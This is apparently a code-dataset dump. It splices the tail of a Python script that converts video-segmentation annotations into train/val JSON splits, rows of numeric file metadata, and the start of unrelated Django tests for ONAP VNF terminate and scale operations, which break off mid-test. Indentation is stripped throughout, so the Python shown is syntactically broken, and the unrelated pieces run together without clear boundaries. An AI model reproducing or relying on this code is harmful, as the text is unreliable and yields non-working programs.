{'supercategory': 'object', 'id': 11, 'name': 'earless_seal'}, {'supercategory': 'object', 'id': 12, 'name': 'elephant'},
{'supercategory': 'object', 'id': 13, 'name': 'fish'}, {'supercategory': 'object', 'id': 14, 'name': 'flying_disc'},
{'supercategory': 'object', 'id': 15, 'name': 'fox'}, {'supercategory': 'object', 'id': 16, 'name': 'frog'},
{'supercategory': 'object', 'id': 17, 'name': 'giant_panda'}, {'supercategory': 'object', 'id': 18, 'name': 'giraffe'},
{'supercategory': 'object', 'id': 19, 'name': 'horse'}, {'supercategory': 'object', 'id': 20, 'name': 'leopard'},
{'supercategory': 'object', 'id': 21, 'name': 'lizard'}, {'supercategory': 'object', 'id': 22, 'name': 'monkey'},
{'supercategory': 'object', 'id': 23, 'name': 'motorbike'}, {'supercategory': 'object', 'id': 24, 'name': 'mouse'},
{'supercategory': 'object', 'id': 25, 'name': 'parrot'}, {'supercategory': 'object', 'id': 26, 'name': 'person'},
{'supercategory': 'object', 'id': 27, 'name': 'rabbit'}, {'supercategory': 'object', 'id': 28, 'name': 'shark'},
{'supercategory': 'object', 'id': 29, 'name': 'skateboard'}, {'supercategory': 'object', 'id': 30, 'name': 'snake'},
{'supercategory': 'object', 'id': 31, 'name': 'snowboard'}, {'supercategory': 'object', 'id': 32, 'name': 'squirrel'},
{'supercategory': 'object', 'id': 33, 'name': 'surfboard'}, {'supercategory': 'object', 'id': 34, 'name': 'tennis_racket'},
{'supercategory': 'object', 'id': 35, 'name': 'tiger'}, {'supercategory': 'object', 'id': 36, 'name': 'train'},
{'supercategory': 'object', 'id': 37, 'name': 'truck'}, {'supercategory': 'object', 'id': 38, 'name': 'turtle'},
{'supercategory': 'object', 'id': 39, 'name': 'whale'}, {'supercategory': 'object', 'id': 40, 'name': 'zebra'}]
removed_class_id = [3,4,7,10,11,13,14,15,16,20,21,22,24,25,28,31,32,33,34,36,38,39,40]
tranformation_dict = {1:1,2:2,5:3,6:4,8:5,9:6,12:7,17:8,18:9,19:10,23:11,26:12,27:13,
29:14,30:15,35:16,37:17}
kept_categories = [{'supercategory': 'object', 'id': 1, 'name': 'airplane'}, {'supercategory': 'object', 'id': 2, 'name': 'bear'},
{'supercategory': 'object', 'id': 3, 'name': 'car'}, {'supercategory': 'object', 'id': 4, 'name': 'cat'},
{'supercategory': 'object', 'id': 5, 'name': 'deer'},
{'supercategory': 'object', 'id': 6, 'name': 'dog'},
{'supercategory': 'object', 'id': 7, 'name': 'elephant'},
{'supercategory': 'object', 'id': 8, 'name': 'giant_panda'}, {'supercategory': 'object', 'id': 9, 'name': 'giraffe'},
{'supercategory': 'object', 'id': 10, 'name': 'horse'},
{'supercategory': 'object', 'id': 11, 'name': 'motorbike'}, {'supercategory': 'object', 'id': 12, 'name': 'person'},
{'supercategory': 'object', 'id': 13, 'name': 'rabbit'},
{'supercategory': 'object', 'id': 14, 'name': 'skateboard'}, {'supercategory': 'object', 'id': 15, 'name': 'snake'},
{'supercategory': 'object', 'id': 16, 'name': 'tiger'},
{'supercategory': 'object', 'id': 17, 'name': 'truck'}, ]
video_info_train = []
video_info_val = []
images_train = []
images_val = []
id_train = 1
id_val = 1
id_image_train = 1
id_image_val = 1
# breakpoint()
for info in video['videos']:
if id_train <= num_train_video:
video_info_train.append({'id': id_train, 'name': info['file_names'][0].split('/')[0]})
for index in range(len(info['file_names'])):
image_info = {'file_name': info['file_names'][index],
'height': info['height'], 'width': info['width'], 'id': id_image_train, 'video_id': id_train, 'frame_id': index}
images_train.append(image_info)
id_image_train += 1
id_train += 1
else:
video_info_val.append({'id': id_val, 'name': info['file_names'][0].split('/')[0]})
for index in range(len(info['file_names'])):
image_info = {'file_name': info['file_names'][index],
'height': info['height'], 'width': info['width'], 'id': id_image_val, 'video_id': id_val, 'frame_id': index}
images_val.append(image_info)
id_image_val += 1
id_val += 1
'''
>>> data['images'][101]
{'file_name': 'b1c66a42-6f7d68ca/b1c66a42-6f7d68ca-0000102.jpg',
'height': 720, 'width': 1280, 'id': 102, 'video_id': 1, 'frame_id': 101}
'''
# breakpoint()
annotation_train = []
annotation_val = []
id_train = 1
id_train_image = 1
id_val = 1
id_val_image = 1
pre_video_id = -1 #video['annotations'][0]['video_id']
for index1 in range(len(video['annotations'])):
if video['annotations'][index1]['video_id'] <= num_train_video:
if pre_video_id != video['annotations'][index1]['video_id']:
cur_video_ann = {}
for index in range(len(video['annotations'][index1]['bboxes'])):
cur_video_ann[index] = []
for index in range(len(video['annotations'][index1]['bboxes'])):
if video['annotations'][index1]['category_id'] not in removed_class_id:
cur_video_ann[index].append([video['annotations'][index1]['bboxes'][index],
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
tranformation_dict[video['annotations'][index1]['category_id']]])
else:
cur_video_ann[index].append([None,
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
video['annotations'][index1]['category_id']])
# annotation_train.append({'id':id_train, 'image_id'})
if index1 == len(video['annotations']) - 1 or video['annotations'][index1]['video_id'] != video['annotations'][index1+1]['video_id']:
for key in list(cur_video_ann.keys()):
instance_id = 1
# print(id_train_image)
for item in cur_video_ann[key]:
if item[0] is None:
annotation_train.append({'id': id_train, 'image_id': id_train_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 1
})
else:
annotation_train.append({'id': id_train, 'image_id': id_train_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 0
})
instance_id += 1
id_train += 1
id_train_image += 1
pre_video_id = video['annotations'][index1]['video_id']
else:
if pre_video_id != video['annotations'][index1]['video_id']:
cur_video_ann = {}
for index in range(len(video['annotations'][index1]['bboxes'])):
cur_video_ann[index] = []
for index in range(len(video['annotations'][index1]['bboxes'])):
if video['annotations'][index1]['category_id'] not in removed_class_id:
cur_video_ann[index].append([video['annotations'][index1]['bboxes'][index],
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
tranformation_dict[video['annotations'][index1]['category_id']]])
else:
cur_video_ann[index].append([None,
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
video['annotations'][index1]['category_id']])
# annotation_train.append({'id':id_train, 'image_id'})
if index1 == len(video['annotations']) - 1 or video['annotations'][index1]['video_id'] != video['annotations'][index1+1]['video_id']:
for key in list(cur_video_ann.keys()):
instance_id = 1
for item in cur_video_ann[key]:
if item[0] is None:
annotation_val.append({'id': id_val, 'image_id': id_val_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 1
})
else:
annotation_val.append({'id': id_val, 'image_id': id_val_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 0
})
instance_id += 1
id_val += 1
id_val_image += 1
pre_video_id = video['annotations'][index1]['video_id']
'''
{'id': 301, 'image_id': 11, 'category_id': 3,
'instance_id': 25, 'bdd100k_id': '00122086',
'occluded': True, 'truncated': False,
'bbox': [664.2417908674067, 367.9733233708366, 36.698191808020056, 28.229378313861503],
'area': 1035.9671399832512, 'iscrowd': 0, 'ignore': 0,
'segmentation':
[[664.2417908674067, 367.9733233708366, 664.2417908674067, 396.2027016846981,
700.9399826754268, 396.2027016846981, 700.9399826754268, 367.9733233708366]]}
'''
new_annotation = dict()
new_annotation['categories'] = kept_categories#video['categories']
new_annotation['videos'] = video_info_train
new_annotation['images'] = images_train
new_annotation['annotations'] = annotation_train
json.dump(new_annotation, open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_train.json', 'w'))
new_annotation['videos'] = video_info_val
new_annotation['images'] = images_val
new_annotation['annotations'] = annotation_val
json.dump(new_annotation, open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_test.json', 'w'))
#
# # postprocessing.
train_data = json.load(open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_train.json'))
not_none_image_id = []
for ann in train_data['annotations']:
if ann['bbox'] is not None:
not_none_image_id.append(ann['image_id'])
full_image_id = list(range(1, train_data['annotations'][-1]['image_id']+1))
none_image_id_train = list(set(full_image_id).difference(set(not_none_image_id)))
# breakpoint()
test_data = json.load(open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_test.json'))
not_none_image_id = []
for ann in test_data['annotations']:
if ann['bbox'] is not None:
not_none_image_id.append(ann['image_id'])
full_image_id = list(range(1, test_data['annotations'][-1]['image_id']+1))
none_image_id_test = list(set(full_image_id).difference(set(not_none_image_id)))
# breakpoint()
video_info_train = []
video_info_val = []
images_train = []
images_val = []
id_train = 1
id_val = 1
id_image_train = 1
id_image_val = 1
id_real_image_train = 1
id_real_image_val = 1
for info in video['videos']:
if id_train <= num_train_video:
video_info_train.append({'id': id_train, 'name': info['file_names'][0].split('/')[0]})
temp = 0
for index in range(len(info['file_names'])):
if id_image_train not in none_image_id_train:
image_info = {'file_name': info['file_names'][index],
'height': info['height'], 'width': info['width'], 'id': id_real_image_train,
'video_id': id_train, 'frame_id': temp}
temp += 1
images_train.append(image_info)
id_real_image_train += 1
id_image_train += 1
id_train += 1
else:
video_info_val.append({'id': id_val, 'name': info['file_names'][0].split('/')[0]})
temp = 0
for index in range(len(info['file_names'])):
if id_image_val not in none_image_id_test:
image_info = {'file_name': info['file_names'][index],
'height': info['height'], 'width': info['width'], 'id': id_real_image_val,
'video_id': id_val, 'frame_id': temp}
temp += 1
images_val.append(image_info)
id_real_image_val += 1
id_image_val += 1
id_val += 1
'''
>>> data['images'][101]
{'file_name': 'b1c66a42-6f7d68ca/b1c66a42-6f7d68ca-0000102.jpg',
'height': 720, 'width': 1280, 'id': 102, 'video_id': 1, 'frame_id': 101}
'''
# breakpoint()
# --- Build per-frame detection annotations and split them into train/val by video id. ---
# NOTE(review): leading indentation was lost when this file was dumped; the code lines
# below are kept byte-identical, with review comments interleaved.
annotation_train = []
annotation_val = []
# Running counters: 'id_*' number every annotation/frame; 'id_real_*' skip frames whose
# ids appear in none_image_id_train / none_image_id_test (frames that have no image).
id_train = 1
id_train_image = 1
id_val = 1
id_val_image = 1
id_real_val_image = 1
id_real_train_image = 1
pre_video_id = -1 #video['annotations'][0]['video_id']
# Each entry of video['annotations'] is one object track: 'bboxes'/'areas' are per-frame
# lists, while 'category_id' and 'iscrowd' are per-track scalars.
for index1 in range(len(video['annotations'])):
# Videos numbered 1..num_train_video go to the train split; the rest go to val.
if video['annotations'][index1]['video_id'] <= num_train_video:
# A new video started: reset the per-frame accumulator, one empty list per frame.
if pre_video_id != video['annotations'][index1]['video_id']:
cur_video_ann = {}
for index in range(len(video['annotations'][index1]['bboxes'])):
cur_video_ann[index] = []
# Append this track's per-frame [bbox, area, iscrowd, category] records. Removed
# classes keep a placeholder with bbox=None (and the raw, unmapped category id) so
# the per-frame ordering of tracks stays aligned.
for index in range(len(video['annotations'][index1]['bboxes'])):
if video['annotations'][index1]['category_id'] not in removed_class_id:
cur_video_ann[index].append([video['annotations'][index1]['bboxes'][index],
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
tranformation_dict[video['annotations'][index1]['category_id']]])
else:
cur_video_ann[index].append([None,
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
video['annotations'][index1]['category_id']])
# annotation_train.append({'id':id_train, 'image_id'})
# Last track of this video (end of list, or next row belongs to another video):
# flush the accumulated per-frame annotations into annotation_train.
if index1 == len(video['annotations']) - 1 or video['annotations'][index1]['video_id'] != video['annotations'][index1+1]['video_id']:
for key in list(cur_video_ann.keys()):
# 'key' is a frame index; instance numbering restarts at 1 for every frame.
instance_id = 1
# print(id_train_image)
for item in cur_video_ann[key]:
# assert item[0] is not None
# Placeholder (removed-class) entries have bbox=None and are not emitted.
if item[0] is not None:
annotation_train.append({'id': id_train, 'image_id': id_real_train_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 0
})
# Mapped category ids are expected to stay inside the kept range.
assert item[3] <= 17
instance_id += 1
id_train += 1
# Advance the frame counters; image-less frames do not get a 'real' image id.
# NOTE(review): with indentation lost it is ambiguous whether instance_id/id_train
# increment per appended item only or also for None placeholders -- confirm against
# the original file before relying on instance numbering.
if id_train_image not in none_image_id_train:
id_real_train_image += 1
id_train_image += 1
pre_video_id = video['annotations'][index1]['video_id']
else:
# Validation split: identical logic to the train branch, using the val-side
# counters and none_image_id_test as the skip list.
if pre_video_id != video['annotations'][index1]['video_id']:
cur_video_ann = {}
for index in range(len(video['annotations'][index1]['bboxes'])):
cur_video_ann[index] = []
for index in range(len(video['annotations'][index1]['bboxes'])):
if video['annotations'][index1]['category_id'] not in removed_class_id:
cur_video_ann[index].append([video['annotations'][index1]['bboxes'][index],
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
tranformation_dict[video['annotations'][index1]['category_id']]])
else:
cur_video_ann[index].append([None,
video['annotations'][index1]['areas'][index],
video['annotations'][index1]['iscrowd'],
video['annotations'][index1]['category_id']])
# annotation_train.append({'id':id_train, 'image_id'})
if index1 == len(video['annotations']) - 1 or video['annotations'][index1]['video_id'] != video['annotations'][index1+1]['video_id']:
for key in list(cur_video_ann.keys()):
instance_id = 1
for item in cur_video_ann[key]:
# assert item[0] is not None
if item[0] is not None:
annotation_val.append({'id': id_val, 'image_id': id_real_val_image, 'category_id': item[3],
'instances_id': instance_id,
'bdd100k_id': 0, 'occluded': False, 'truncated': False,
'bbox': item[0], 'area': item[1], 'iscrowd': item[2], 'ignore': 0
})
assert item[3] <= 17
instance_id += 1
id_val += 1
if id_val_image not in none_image_id_test:
id_real_val_image += 1
id_val_image += 1
pre_video_id = video['annotations'][index1]['video_id']
# --- Assemble the final annotation dicts and write the train/val JSON files. ---
# Top-level script code; relies on the lists built by the loops above.
new_annotation = dict()
new_annotation['categories'] = kept_categories  # filtered category list (replaces video['categories'])
new_annotation['videos'] = video_info_train
new_annotation['images'] = images_train
new_annotation['annotations'] = annotation_train
# Fix: use a context manager so the handle is closed and flushed deterministically;
# the original passed an anonymous open(...) to json.dump and leaked the file handle.
with open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_train.json', 'w') as f:
    json.dump(new_annotation, f)
# Reuse the same dict for the validation split, swapping in the val-side lists.
new_annotation['videos'] = video_info_val
new_annotation['images'] = images_val
new_annotation['annotations'] = annotation_val
# NOTE(review): the val split is written under .../train/ as instances_test.json --
# path kept identical to the original; confirm the location is intentional.
with open('/nobackup-slow/dataset/my_xfdu/video/vis/train/instances_test.json', 'w') as f:
    json.dump(new_annotation, f)
# Fix: removed a leftover breakpoint() debug call that would drop batch runs into pdb.
| 55.953039
| 141
| 0.526142
| 2,223
| 20,255
| 4.573099
| 0.088169
| 0.103876
| 0.125516
| 0.037183
| 0.879697
| 0.771592
| 0.734802
| 0.73431
| 0.720539
| 0.713653
| 0
| 0.051147
| 0.305011
| 20,255
| 361
| 142
| 56.108033
| 0.671024
| 0.024636
| 0
| 0.764505
| 0
| 0
| 0.234029
| 0.024306
| 0
| 0
| 0
| 0
| 0.006826
| 1
| 0
| false
| 0
| 0.006826
| 0
| 0.006826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a88e05ddea54b9bb4e52ec3fae22b523ca65f2af
| 123,294
|
py
|
Python
|
lcm/ns_vnfs/tests/tests.py
|
onap/vfc-nfvo-lcm
|
b7d4d015fa96a246d73d863092d3362afcedc284
|
[
"Apache-2.0"
] | 4
|
2018-08-29T02:51:38.000Z
|
2021-11-16T11:36:11.000Z
|
lcm/ns_vnfs/tests/tests.py
|
onap/vfc-nfvo-lcm
|
b7d4d015fa96a246d73d863092d3362afcedc284
|
[
"Apache-2.0"
] | null | null | null |
lcm/ns_vnfs/tests/tests.py
|
onap/vfc-nfvo-lcm
|
b7d4d015fa96a246d73d863092d3362afcedc284
|
[
"Apache-2.0"
] | 1
|
2019-05-12T08:21:19.000Z
|
2019-05-12T08:21:19.000Z
|
# Copyright 2016-2017 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import uuid
import time
import mock
from django.test import TestCase, Client
from rest_framework import status
from lcm.ns_vnfs.biz.grant_vnfs import GrantVnfs
from lcm.pub.database.models import VLInstModel, NfInstModel, JobModel, NSInstModel, VmInstModel, \
OOFDataModel, VNFCInstModel, PortInstModel, CPInstModel, SubscriptionModel
from lcm.pub.exceptions import NSLCMException
from lcm.pub.utils import restcall
from lcm.jobs.enum import JOB_MODEL_STATUS, JOB_TYPE, JOB_ACTION, JOB_PROGRESS
from lcm.pub.utils.jobutil import JobUtil
from lcm.pub.utils.timeutil import now_time
from lcm.pub.utils.values import ignore_case_get
from lcm.ns_vnfs.biz.grant_vnf import GrantVnf
from lcm.ns_vnfs.biz.heal_vnfs import NFHealService
from lcm.ns_vnfs.biz.scale_vnfs import NFManualScaleService
from lcm.ns_vnfs.biz.subscribe import SubscriptionDeletion
from lcm.ns_vnfs.biz.terminate_nfs import TerminateVnfs
from lcm.ns_vnfs.enum import VNF_STATUS, LIFE_CYCLE_OPERATION, RESOURCE_CHANGE_TYPE, VNFC_CHANGE_TYPE, \
INST_TYPE, NETWORK_RESOURCE_TYPE
from lcm.ns_vnfs.biz.place_vnfs import PlaceVnfs
from lcm.ns_vnfs.tests.test_data import vnfm_info, vim_info, vnf_place_request
from lcm.ns_vnfs.tests.test_data import nf_package_info, nsd_model_dict, subscription_response_data
from lcm.ns_vnfs.biz.create_vnfs import CreateVnfs
from lcm.ns_vnfs.biz import create_vnfs, grant_vnf
from lcm.ns_vnfs.biz.update_vnfs import NFOperateService
from lcm.ns_vnfs.biz.verify_vnfs import VerifyVnfs
from lcm.ns.enum import OWNER_TYPE
from lcm.ns_vnfs.biz.handle_notification import HandleVnfLcmOocNotification, HandleVnfIdentifierCreationNotification, \
HandleVnfIdentifierDeletionNotification
from lcm.ns_vnfs.biz.notify_lcm import NotifyLcm
class TestGetVnfViews(TestCase):
    """Tests for the single-VNF query endpoint (/api/nslcm/v1/ns/vnfs/<id>)."""

    def setUp(self):
        # One active NF instance record backs the query under test.
        self.client = Client()
        self.nf_inst_id = str(uuid.uuid4())
        fixture = NfInstModel(
            nfinstid=self.nf_inst_id,
            nf_name="vnf1",
            vnfm_inst_id="1",
            vnf_id="vnf_id1",
            status=VNF_STATUS.ACTIVE,
            create_time=now_time(),
            lastuptime=now_time(),
        )
        fixture.save()

    def tearDown(self):
        # Drop every NF record so tests stay independent.
        NfInstModel.objects.all().delete()

    def test_get_vnf(self):
        # GET by instance id must succeed and echo the id back as vnfInstId.
        url = "/api/nslcm/v1/ns/vnfs/%s" % self.nf_inst_id
        resp = self.client.get(url)
        self.assertEqual(status.HTTP_200_OK, resp.status_code)
        body = json.loads(resp.content)
        self.assertEqual(self.nf_inst_id, body["vnfInstId"])
# Tests for VNF termination: the REST entry point plus TerminateVnfs.run() under
# mocked VNFM/resmgr responses (success, missing vnf uuid, missing NF, busy NF, job error).
# NOTE(review): indentation was lost in this dump; code lines are kept byte-identical.
class TestTerminateVnfViews(TestCase):
def setUp(self):
# Fixture tree: NS + NF (nfinstid "1", vnfm "1", external uuid "111") + VM.
# The mocked URL keys in the tests below encode exactly these ids.
self.client = Client()
self.data = {
"terminationType": "forceful",
"gracefulTerminationTimeout": "600"
}
self.ns_inst_id = str(uuid.uuid4())
self.nf_inst_id = "1"
self.vim_id = str(uuid.uuid4())
self.job_id = str(uuid.uuid4())
self.nf_uuid = "111"
self.vnfd_model = {"metadata": {"vnfdId": "1"}}
# Clear any leftovers before creating fixtures.
NSInstModel.objects.all().delete()
NfInstModel.objects.all().delete()
VmInstModel.objects.all().delete()
NSInstModel(id=self.ns_inst_id, name="ns_name").save()
NfInstModel.objects.create(nfinstid=self.nf_inst_id,
vnfm_inst_id="1",
status="active",
mnfinstid=self.nf_uuid,
vnfd_model=self.vnfd_model
)
VmInstModel.objects.create(vmid="1",
vimid='{"cloud_owner": "VCPE", "cloud_regionid": "RegionOne"}',
instid=self.nf_inst_id
)
SubscriptionModel(vnf_instance_filter=self.nf_inst_id, callback_uri="", links="").save()
def tearDown(self):
NSInstModel.objects.all().delete()
NfInstModel.objects.all().delete()
VmInstModel.objects.all().delete()
SubscriptionModel.objects.all().delete()
# The REST view only needs to accept the request; the worker is mocked out.
@mock.patch.object(TerminateVnfs, "run")
def test_terminate_vnf_url(self, mock_run):
req_data = {
"terminationType": "forceful",
"gracefulTerminationTimeout": "600"}
response = self.client.post("/api/nslcm/v1/ns/terminatevnf/%s" % self.nf_inst_id, data=req_data)
self.assertEqual(status.HTTP_202_ACCEPTED, response.status_code)
# Happy path: all downstream calls succeed, the NF record is deleted and the job
# reaches 100% progress.
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_terminate_vnf(self, mock_call_req, mock_sleep):
job_id = JobUtil.create_job(JOB_TYPE.VNF, JOB_ACTION.TERMINATE, self.nf_inst_id)
job_info = {
"jobId": job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.FINISHED}
}
# call_req is dispatched on its 5th positional argument (the resource URL),
# so mock_vals keys must match those URLs exactly.
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/1?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/1/vnfs/111/terminate":
[0, json.JSONEncoder().encode({"jobId": job_id}), "200"],
"/api/ztevnfmdriver/v1/1/jobs/" + job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"],
"/api/resmgr/v1/vnf/1":
[0, json.JSONEncoder().encode({"jobId": job_id}), "200"],
# NOTE(review): this key has no leading slash, unlike the others -- confirm it
# matches the URL actually passed by the subscription-deletion code.
"api/gvnfmdriver/v1/1/subscriptions/":
[0, json.JSONEncoder().encode({}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
TerminateVnfs(self.data, self.nf_inst_id, job_id).run()
# The NF record must be gone after a successful terminate.
nfinst = NfInstModel.objects.filter(nfinstid=self.nf_inst_id)
if nfinst:
self.assertEqual(1, 0)
else:
self.assertEqual(1, 1)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, 100)
# Same flow but the NF has no external uuid (mnfinstid unset), so the driver URL
# contains the literal "None"; subscription deletion is mocked away entirely.
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
@mock.patch.object(SubscriptionDeletion, "send_subscription_deletion_request")
def test_terminate_vnf_when_no_vnf_uuid(self, mock_send_subscription_deletion_request, mock_call_req, mock_sleep):
nf_inst_id = "test_terminate_vnf_when_no_vnf_uuid"
NSInstModel(id=nf_inst_id, name="ns_name_2").save()
NfInstModel.objects.create(nfinstid=nf_inst_id,
vnfm_inst_id="2",
status="active",
vnfd_model=self.vnfd_model
)
VmInstModel.objects.create(vmid="2",
vimid='{"cloud_owner": "VCPE", "cloud_regionid": "RegionOne"}',
instid=nf_inst_id
)
job_id = JobUtil.create_job(JOB_TYPE.VNF, JOB_ACTION.TERMINATE, nf_inst_id)
job_info = {
"jobId": job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.FINISHED}
}
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/2?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/2/vnfs/None/terminate":
[0, json.JSONEncoder().encode({"jobId": job_id}), "200"],
"/api/ztevnfmdriver/v1/2/jobs/" + job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"],
"/api/resmgr/v1/vnf/%s" % nf_inst_id:
[0, json.JSONEncoder().encode({"jobId": job_id}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
TerminateVnfs(self.data, nf_inst_id, job_id).run()
nfinst = NfInstModel.objects.filter(nfinstid=nf_inst_id)
if nfinst:
self.assertEqual(1, 0)
else:
self.assertEqual(1, 1)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, 100)
# Unknown NF id: the job must end in the error progress value 255.
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
@mock.patch.object(SubscriptionDeletion, "send_subscription_deletion_request")
def test_terminate_vnf_when_nf_not_exists(self, mock_send_subscription_deletion_request, mock_call_req, mock_sleep):
job_id = JobUtil.create_job(JOB_TYPE.VNF, JOB_ACTION.TERMINATE, self.nf_inst_id)
TerminateVnfs(self.data, "nf_not_exists", job_id).run()
nfinst = NfInstModel.objects.filter(nfinstid="nf_not_exists")
if nfinst:
self.assertEqual(1, 0)
else:
self.assertEqual(1, 1)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, 255)
# An NF already terminating is rejected: status flips to FAILED, job to 255.
def test_terminate_vnf_when_vnf_is_dealing(self):
NfInstModel.objects.filter(nfinstid=self.nf_inst_id).update(status=VNF_STATUS.TERMINATING)
job_id = JobUtil.create_job(JOB_TYPE.VNF, JOB_ACTION.TERMINATE, self.nf_inst_id)
TerminateVnfs(self.data, self.nf_inst_id, job_id).run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.FAILED)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, 255)
# Driver reports job ERROR: NF stays but is marked FAILED, job ends at 255.
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
@mock.patch.object(SubscriptionDeletion, "send_subscription_deletion_request")
def test_terminate_vnf_when_job_error(self, mock_send_subscription_deletion_request, mock_call_req, mock_sleep):
job_id = JobUtil.create_job(JOB_TYPE.VNF, JOB_ACTION.TERMINATE, self.nf_inst_id)
job_info = {
"jobId": job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.ERROR}
}
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/1?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/1/vnfs/111/terminate":
[0, json.JSONEncoder().encode({"jobId": job_id}), "200"],
"/api/ztevnfmdriver/v1/1/jobs/" + job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
TerminateVnfs(self.data, self.nf_inst_id, job_id).run()
self.assertEqual(NfInstModel.objects.get(nfinstid=self.nf_inst_id).status, VNF_STATUS.FAILED)
self.assertEqual(JobModel.objects.get(jobid=job_id).progress, 255)
# Tests for manual VNF scaling via NFManualScaleService under mocked driver replies.
# NOTE(review): indentation was lost in this dump; code lines are kept byte-identical.
class TestScaleVnfViews(TestCase):
def setUp(self):
# One NF record wired to vnfm "vnfm_inst_id_001" / external id "m_nf_inst_id_001";
# the mocked URLs below embed these ids.
self.client = Client()
self.nf_inst_id = str(uuid.uuid4())
self.url = "/api/nslcm/v1/ns/ns_vnfs/%s/scaling" % self.nf_inst_id
self.data = {
"scaleVnfData":
{
"type": "SCALE_OUT",
"aspectId": "demo_aspect1",
"numberOfSteps": 1,
"additionalParam": {}
}
}
NfInstModel.objects.create(nfinstid=self.nf_inst_id, vnfm_inst_id="vnfm_inst_id_001",
mnfinstid="m_nf_inst_id_001")
def tearDown(self):
NfInstModel.objects.all().delete()
# def test_scale_vnf_view(self):
# response = self.client.post(self.url, self.data)
# self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
# Happy path: driver accepts scale and reports FINISHED; NF stays ACTIVE.
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_scale_vnf_success(self, mock_call_req, mock_sleep):
scale_service = NFManualScaleService(self.nf_inst_id, self.data)
job_info = {
"jobId": scale_service.job_id,
"responsedescriptor": {"status": JOB_MODEL_STATUS.FINISHED}
}
# call_req is dispatched on its 5th positional argument (the resource URL).
mock_vals = {
"/external-system/esr-vnfm-list/esr-vnfm/vnfm_inst_id_001?depth=all":
[0, json.JSONEncoder().encode(vnfm_info), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/vnfs/m_nf_inst_id_001/scale":
[0, json.JSONEncoder().encode({"jobId": scale_service.job_id}), "200"],
"/api/ztevnfmdriver/v1/vnfm_inst_id_001/jobs/" + scale_service.job_id + "?responseId=0":
[0, json.JSONEncoder().encode(job_info), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
scale_service.run()
nsIns = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
self.assertEqual(nsIns.status, VNF_STATUS.ACTIVE)
jobs = JobModel.objects.get(jobid=scale_service.job_id)
self.assertEqual(JOB_PROGRESS.FINISHED, jobs.progress)
# Driver job ends in ERROR: NF status stays ACTIVE but the job records ERROR.
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
